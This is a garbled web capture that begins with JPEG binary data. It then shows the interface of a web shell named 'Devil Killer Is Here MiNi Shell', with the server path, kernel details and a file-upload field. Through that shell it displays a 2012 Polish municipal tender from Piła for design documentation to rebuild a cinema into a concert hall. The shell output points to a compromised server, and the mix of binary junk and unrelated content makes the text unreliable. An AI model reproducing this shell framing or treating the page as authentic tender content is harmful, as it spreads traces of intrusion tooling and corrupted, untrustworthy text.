JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/244684-N-2012.html

<p class="kh_header"><b>Piła: Opracowanie kompleksowej wielobranżowej dokumentacji projektowej budowlanej, wykonawczej i kosztorysowej dla zadania: Miejska sala koncertowo-audiowizualna w budynku w Pile przy ul. Dąbrowskiego 8 - rozbudowa i przebudowa istniejącej sali kinowej na salę koncertowo-audiowizualną wraz z uzupełnieniem programu o funkcje garderoby, pomieszczeń techniczno-socjalnych i gastronomii.</b><br>
<b>Numer ogłoszenia: 244684 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej wielobranżowej dokumentacji projektowej budowlanej, wykonawczej i kosztorysowej dla zadania: Miejska sala koncertowo-audiowizualna w budynku w Pile przy ul. Dąbrowskiego 8 - rozbudowa i przebudowa istniejącej sali kinowej na salę koncertowo-audiowizualną wraz z uzupełnieniem programu o funkcje garderoby, pomieszczeń techniczno-socjalnych i gastronomii..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie będzie obejmowało dokumentację budowlano-wykonawczą obiektu w tym audyt akustyczny i projekt akustyczny, projekt wykonawczy aranżacji wnętrz, technologii audiowizualnej. 
Projekt  dla części wspólnej obiektu wymaga uzgodnień. 
Wymagane jest, aby projekt  akustyczny i technologiczny sali zawierał co najmniej:
1) Pomiary w zakresie akustyki wnętrz:
a) Pomiary parametrów akustyki wnętrza mające na celu określenie obecnego stanu sali na
    podstawie których możliwe będzie opracowanie szczegółowych założeń do projektowania
    akustycznego oraz architektonicznego.
2) Projekt akustyki wnętrz:
a) Szczegółowe analizy i obliczenia (w tym symulacje komputerowe )akustyki wnętrza sali
    audiowizualnej.
b) Wytyczne do projektu architektury dotyczące układu przegród, geometrii wystroju wnętrza-
    w tym dotyczące okładzin ściennych i sufitowych dla sali audiowizualnej.
c) Obliczenia  i wytyczne dla sali audiowizualnej ze względu na jej funkcję z punktu widzenia
 akustyki, w celu osiągnięcia odpowiedniego komfortu akustycznego, parametrów
    akustycznych wymaganych dla muzyki klasycznej  i zrozumiałości mowy.
3) Projekt systemu elektroakustycznego  i systemu inspicjenta sali audiowizualnej:
             a) Określenie wymogów funkcjonalnych, jakościowych i strukturalnych.
             b) Komputerowy model elektro-akustyczny dla widowni oraz dobór i rozmieszczenie
                 urządzeń głośnikowych na podstawie modelowania komputerowego.
             c) Schematy systemu elektroakustycznego i inspicjenta.
             d) Projekt okablowania sygnałowego: rodzaje koryt, kabli, złączy, wytyczne tras kablowych.
             e) Dobór rozwiązań dopasowanych do potrzeb i budżetu oraz dobór wraz z rozmieszczeniem
                 urządzeń i przyłączy sygnałowych systemów elektroakustycznego i inspicjenta.
             f) Dokładne wytyczne umożliwiające stworzenie przez projektanta elektryki projektu zasilania
                 systemu elektroakustycznego.
        4)  Wytyczne dla wyposażenia i technologii użytkowania:
              a) Wytyczne technologiczne dotyczące funkcjonalnego rozmieszczenia funkcji, obszarów i
                   urządzeń istotnych z punktu widzenia rozwiązań technologii estradowej i konferencyjnej,
                   organizacji i obsługi występów i konferencji, interakcji między jednocześnie działającymi
                   pomieszczeniami.
              b) Wytyczne dla  oświetlenia ogólnego.
              c) Wytyczne dla zasilania urządzeń technologicznych.
W ramach opracowania należy wykonać w szczególności:
1) Koncepcję architektoniczną i aranżacji wnętrz (w 2 wariantach) z kolorystyką i rysunkami przyjętych rozwiązań- niezbędne jest przedstawienie wizualizacji proponowanych rozwiązań w wersji komputerowej lub odręcznej z propozycja rozwiązań materiałowych z uwzględnieniem połączenia i części wspólnej z Pilskim Inkubatorem Przedsiębiorczości.
Podstawą do wykonania projektu budowlanego będzie ostateczna wersja projektu     
             koncepcyjnego posiadająca akceptację Zamawiającego,
       2)  Materiały do wystąpienia o uzyskanie decyzji środowiskowej (jesli będzie taka potrzeba  i
            decyzji o ustaleniu lokalizacji inwestycji celu publicznego,
       3)  Aktualną mapę do celów projektowych dla terenu objętego inwestycją,


4) Plan zagospodarowania terenu w skali 1:500 na aktualnym podkładzie geodezyjnym,
5) Zbiorczą planszę uzbrojenia terenu i zagospodarowania terenu uzgodnioną w ZUDP,
6) Badania i dokumentację geotechniczną- (w razie potrzeby),
7) Projekt gospodarki zielenią obejmujący inwentaryzację istniejącej zieleni ze wskazaniem drzew do  wycinki i przesadzenia, 
8) Projekty architektoniczne sali wielofunkcyjnej i  małej architektury, 
9) Projekt aranżacji wnętrz z kolorystyką i rysunkami wykonawczymi dla przyjętych rozwiązań,
10) Projekty technologii wyposażenia pomieszczeń ze szczegółowym zestawieniem wyposażenia w  meble, komputery, sprzęt RTV, żaluzje, verticale, regały, wyposażenie sanitariatów, szatni, poczekalni, sal tematycznych i innych - określający w sposób precyzyjny parametry techniczne, gabaryty, materiały, kolorystykę i sposób wykończenia, typy lub symbole katalogowe przyjętego wyposażenia, projekt wyposażenia sanitariatów i toalet ogólnodostępnych przy Pilskim Inkubatorze Przedsiębiorczości. 
11) Detale architektoniczne,
12) Projekty konstrukcyjne wraz z obliczeniami,,
13) Projekt wewnętrznych instalacji wod-kan i p.poż ,
14) Projekt wewnętrznych instalacji c.o., c.w,
15) Projekt wewnętrznych instalacji elektrycznych oświetlenia i gniazd wtykowych oraz oświetlenia awaryjnego,
16) Projekt instalacji niskoprądowych (alarmowej włamania i napadu, domofonowej, monitoring wewnętrzny i zewnętrzny),
17) Projekt instalacji komputerowej logicznej z dostosowaniem do internetu z zasileniem i wyposażeniem w sprzęt z UPS, 
18) Projekt instalacji alarmowej p.poż., o ile będzie wymagany przepisami,
19) Projekt oznakowania p.poż. wraz z rozmieszczeniem i wykazem sprzętu p.poż. i instrukcją pożarową,
20) Projekt instalacji telefonicznej ze stałym złączem internetowym,
21) Projekt instalacji RTV,
22) Projekty drogowe dla parkingu zewnętrzeno - przebudowa,
23) Projekty klimatyzacji  i wentylacji mechanicznej  z odzyskiem ciepła,
24) Informacja dotycząca bezpieczeństwa i ochrony zdrowia służąca do opracowania przez wykonawcę robót planu bezpieczeństwa i ochrony zdrowia w czasie realizacji budowy,
25) Projekt zagospodarowania placu budowy,
26) Kosztorysy inwestorskie dla wszystkich branż,
27) Przedmiary robót w układzie kosztorysowym dla wszystkich branż, 
28) Specyfikacje techniczne wykonania i odbioru robót;
29) Wszystkie wymagane uzgodnienia branżowe,
30) Charakterystyki i świadectwa  energetycznego,
31) Inne opracowania projektowe niezbędne do zrealizowania inwestycji zgodnie z założeniami.
Każdą dokumentację techniczną  wraz ze spisem zawartości należy dostarczyć w następujących ilościach egzemplarzy: 
 1. Dokumentację projektową należy opracować w III częściach:
    1)  część I  - materiały  do wystąpienia o uzyskanie decyzji środowiskowej oraz  decyzji o ustaleniu
                        lokalizacji celu publicznego w formie papierowej (3 egz.) i formie elektronicznej (pliki
                        PDF - 3 płyty CD)
    2)  część II - projekty budowlane w formie papierowej (6 egz.) i formie elektronicznej (pliki PDF - 
                         3 płyty CD) niezbędne do uzyskania pozwolenia na budowę,
    3)  część III - projekty wykonawcze w formie papierowej (5 egz.) i formie elektronicznej (pliki
                           PDF - 3 płyty CD),
 2. kosztorysy inwestorskie w formie papierowej (2 egz.) i formie elektronicznej (pliki PDF - 2 płyty
     CD),
 3. przedmiary robót w formie papierowej (7 egz.) i formie elektronicznej (pliki PDF - 3 płyty CD),
 4. specyfikacje techniczne wykonania i odbioru robót budowlanych dla wszystkich branż w formie
     papierowej (7 egz.) i formie elektronicznej (pliki PDF - 3 płyty CD), 
 
3. Dokumentację projektową należy opracować zgodnie z założeniami programowymi oraz obowiązującymi przepisami, w szczególności:
 a) Prawo Budowlane z dnia 7 lipca 1994r. (Dz.U z dnia 2006r. Nr 156 poz. 1118 z późn.  zm),
 b) Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i
     formy projektu budowlanego (Dz. U. z 2003r. Nr 120 poz.1133 z późn. zm.),
 c) Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków
     technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002r. Nr 75 poz.
     690 z późn. zm.),
 d) Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16.06.2003r. (Dz. U. Nr
     121) w sprawie:  
      -  uzgadniania projektu budowlanego pod względem ochrony przeciwpożarowej (poz. 1137),
      -  przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych (poz. 1139).
 e) Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006r.  W
     sprawie ochrony przeciwpożarowej budynku , innych obiektów  budowlanych i terenów (Dz. U. Nr
     80 poz. 563)
 f) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego
     zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót
     budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004r. Nr 202 poz. 2072 z późn.
     zm.),
 g) Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i
     podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac
     projektowych oraz planowanych kosztów robót budowlanych określonych w programie
     funkcjonalno-użytkowym (Dz.U. z 2004r. Nr 130 poz.1389),
 h) Dyrektywą 2002/91/WE Parlamentu Europejskiego i Rady UE z dnia 16 grudnia 2002r. w sprawie
     charakterystyki energetycznej budynków wraz z Rozporządzeniem Ministra Infrastruktury z dnia
     06 listopada 2008r. w sprawie metodologii obliczania charakterystyki energetycznej budynku i
     lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową
     oraz sposobu sporządzania i wzorów świadectw ich charakterystyki energetycznej (Dz. U. z 2008r.
     Nr 201 poz. 1240) oraz innych uwarunkowań prawnych regulujących projektowanie i realizację
     inwestycji budowlanych. 

Wykonawca winien dołożyć najwyższej staranności w celu prawidłowego sporządzenia oferty, a zwłaszcza rzetelnego wyliczenia ceny oferty adekwatnej dla realizacji kompletnego przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się należytym wykonaniem w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej, odpowiadającej swoim rodzajem  usługi stanowiącej przedmiot zamówienia, tzn. wykonaniem kompleksowej wielobranżowej dokumentacji projektowej budowlanej, wykonawczej i kosztorysowej ogólnodostępnego  obiektu o charakterze  kulturalnym lub edukacyjnym z salą  widowiskową,   kinową, teatralną, aulą  lub wielofunkcyjną na  nie mniej  niż  200 miejsc siedzących  zaliczającego  się wg Polskiej Klasyfikacji Obiektów Budowlanych do klasy:
Sekcja 1; Dział 12; Grupa 126; Klasa 1261,1262  i 1263w części niżej wymienionej: 
kina, sale koncertowe , opery, teatry itp.,
sale kongresowe, domy kultury i wielozadaniowe sale do wykorzystania  głównie  do celów rozrywkowych,
kasyna , cyrki, teatry muzyczne, sale taneczne, dyskoteki, estrady itp.
muzea, galerie sztuki, biblioteki i centra  informacyjne,
budynki szkolnictwa  ponadpodstawowego,
budynki szkół wyższych i placówki badawcze,
Warunek, o którym mowa powyżej, musi być udokumentowany w wykazie zrealizowanych dokumentacji projektowych z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie. 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać,że: ww warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował co najmniej po 1 projektancie w branży: architektonicznej, konstrukcyjnej, sanitarnej, elektrycznej i drogowej, którzy będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności i posiadających uprawnienia do projektowania oraz posiadających aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego zgodnie z art. 12 ustawy z dnia 7 lipca Prawo budowlane (Dz. U. z 2006r. nr 156, poz. 1118 - tekst jedn. ze zm.).
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać,że: ww warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać posiadanie środków własnych lub  w banku lub spółdzielczej kasie oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, środków finansowych lub zdolności kredytowej wykonawcy w kwocie nie mniejszej niż 80.000,00 zł (słownie: osiemdziesiąt  tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) -
    przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
2)  Parafowany projekt  umowy 
3)  Zestawienie kosztów prac projektowych - załącznik 1a do SIWZ
4)  Wstępny harmonogram rzeczowo - finansowy wykonania i przekazania dokumentacji - załącznik nr 1b do
    SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Zmiana okresu przewidzianego na ukończenie robót:
1. zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w
    szczególności: 
    a) wstrzymanie robót przez Zamawiającego;
    b) zmiany będące następstwem działania organów administracji i innych podmiotów o
        kompetencjach zbliżonych do organów administracji, w szczególności eksploatatorów
        infrastruktury oraz właścicieli gruntów pod inwestycję, w tym:
        - przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma
          - typowych w danych okolicznościach, terminów wydawania przez organy
          administracji  lub Inne podmioty decyzji, zezwoleń, uzgodnień itp;
        - odmowa wydania przez organy administracji lub Inne podmioty wymaganych decyzji,
          zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, w tym odmowa
          udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;
        - zmiany spowodowane koniecznością wykonania zamówienia dodatkowego, w
          rozumieniu  przepisów o zamówieniach publicznych, którego realizacja będzie miała
          wpływ na termin  wykonania przedmiotu umowy.
II. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami: 
1) zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy nie inne niż
    spełniające warunki określone w SIWZ, według polityki kadrowej Wykonawcy; zmiana
    tych osób nie wymaga aneksu do umowy (dla skutecznej zmiany niezbędna jest uzyskanie
    zgody Zamawiającego na zaproponowaną osobę);
2) zmiana umowy w zakresie podwykonawców, za uprzednią zgodą Zamawiającego, tj.
    możliwe  powierzenie podwykonawcom innej części robót niż wskazana w ofercie
    Wykonawcy, a także  możliwa zmiana podwykonawcy na etapie realizacji robót, o ile nie
    sprzeciwia się to  postanowieniem SIWZ,
3) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
4) kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty lub
    Zamawiającego  inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone
    do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji;

Każdy wniosek o zmianę zapisów umowy winien być przedłożony przez wykoanawcę pisemnie wraz z uzasadnieniem. Zmiana zapisów umowy może być przez Zamawiającego uznana wyłącznie w zakresie określonym w art. 144 ust. 1 ustwy pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2012 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
